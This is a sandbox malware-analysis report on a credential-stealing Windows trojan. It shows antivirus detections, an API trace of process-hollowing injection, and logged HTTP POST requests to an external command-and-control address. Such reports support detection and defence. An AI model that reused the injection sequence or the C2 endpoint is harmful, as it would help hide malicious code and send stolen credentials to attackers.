CreateProcessInternalW
thread_identifier: 1816
thread_handle: 0x00004184
process_identifier: 2448
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x0001148c
inherit_handles: 0
success 1 0
1619948455.417343
NtGetContextThread
thread_handle: 0x00004184
success 0 0
1619948455.417343
NtAllocateVirtualMemory
process_identifier: 2448
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0001148c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
1619948455.808343
CreateProcessInternalW
thread_identifier: 2440
thread_handle: 0x00011490
process_identifier: 2796
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x0000d4a0
inherit_handles: 0
success 1 0
1619948455.808343
NtGetContextThread
thread_handle: 0x00011490
success 0 0
1619948455.808343
NtAllocateVirtualMemory
process_identifier: 2796
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x0000d4a0
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
failed 3221225496 0
1619948456.120343
CreateProcessInternalW
thread_identifier: 2576
thread_handle: 0x00011498
process_identifier: 2840
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\da9553fee49b148e4b7f08b767adab95.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00006d8c
inherit_handles: 0
success 1 0
1619948456.120343
NtGetContextThread
thread_handle: 0x00011498
success 0 0
1619948456.120343
NtAllocateVirtualMemory
process_identifier: 2840
region_size: 663552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00006d8c
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
success 0 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ÌÍxþˆ¬­ˆ¬­ˆ¬­Ô•­‰¬­K£K­Š¬­ ­‰¬­=2󭋬­ˆ¬­Œ¬­Ôƒ­‰¬­ˆ¬­Ç¬­Ô…­™¬­=2÷­ó¬­=2È­‰¬­Richˆ¬­PEL…lWà  8¢Þ9P@ €ЎdP\.textõ68 `.rdata`@PB<@@.data$^ ~@À.x €À
process_handle: 0x00006d8c
base_address: 0x00400000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer:
process_handle: 0x00006d8c
base_address: 0x00401000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer:
process_handle: 0x00006d8c
base_address: 0x00415000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: ™TÍ<¨‡K¢`ˆˆÝ;U
process_handle: 0x00006d8c
base_address: 0x0041a000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer:
process_handle: 0x00006d8c
base_address: 0x004a0000
success 1 0
1619948456.120343
WriteProcessMemory
process_identifier: 2840
buffer: @
process_handle: 0x00006d8c
base_address: 0x7efde008
success 1 0
1619948456.120343
NtSetContextThread
thread_handle: 0x00011498
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2840
success 0 0
1619948456.355343
NtResumeThread
thread_handle: 0x00011498
suspend_count: 1
process_identifier: 2840
success 0 0
1619962682.129124
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2840
success 0 0
File has been identified by 51 AntiVirus engines on VirusTotal as malicious (50 out of 51 个事件)
Elastic malicious (high confidence)
FireEye Generic.mg.da9553fee49b148e
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
McAfee Fareit-FZD!DA9553FEE49B
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 0056d9bf1 )
Alibaba TrojanPSW:MSIL/AgentTesla.8b680041
K7GW Trojan ( 0056d9ff1 )
Cybereason malicious.29c97d
Arcabit Trojan.Generic.D20DDD6F
Cyren W32/MSIL_Kryptik.BNP.gen!Eldorado
Symantec Packed.Generic.570
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 85)
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender Trojan.GenericKD.34463087
NANO-Antivirus Trojan.Win32.Agensla.hvfbmx
Paloalto generic.ml
AegisLab Trojan.Multi.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.34463087
Ad-Aware Trojan.GenericKD.34463087
Emsisoft Trojan.GenericKD.34463087 (B)
Comodo Malware@#7if6igv451x1
DrWeb Trojan.PWS.Siggen2.54322
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-R + Troj/MSIL-PPV
McAfee-GW-Edition BehavesLike.Win32.Generic.fc
Sophos Troj/MSIL-PPV
Ikarus Trojan.MSIL.Inject
Jiangmin Trojan.PSW.MSIL.apvu
Avira TR/Kryptik.jnnhr
Antiy-AVL Trojan[PSW]/MSIL.Agensla
Microsoft Trojan:MSIL/AgentTesla.PBI!MTB
ZoneAlarm HEUR:Trojan-PSW.MSIL.Agensla.gen
GData Trojan.GenericKD.34463087
AhnLab-V3 Trojan/Win32.Kryptik.R350011
BitDefenderTheta Gen:NN.ZemsilCO.34570.xm0@a0rdM9p
ALYac Trojan.GenericKD.34463087
MAX malware (ai score=87)
ESET-NOD32 a variant of MSIL/Kryptik.XOE
Yandex Trojan.AvsArher.bSK66A
SentinelOne DFI - Suspicious PE
MaxSecure Trojan.Malware.74499699.susgen
Fortinet MSIL/Kryptik.XRP!tr
Webroot W32.Trojan.Gen
AVG Win32:MalwareX-gen [Trj]
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_100% (W)
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-02 13:23:10

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 209.99.16.199 reiangkor.com 80
192.168.56.101 49181 209.99.16.199 reiangkor.com 80
192.168.56.101 49182 209.99.16.199 reiangkor.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49236 239.255.255.250 3702
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 49235 8.8.8.8 53

HTTP & HTTPS Requests

URI Data
http://reiangkor.com/admin/lang/css/king/admin/fre.php 
POST /admin/lang/css/king/admin/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: reiangkor.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E036EB0C
Content-Length: 169
Connection: close
http://reiangkor.com/admin/lang/css/king/admin/fre.php 
POST /admin/lang/css/king/admin/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: reiangkor.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: E036EB0C
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.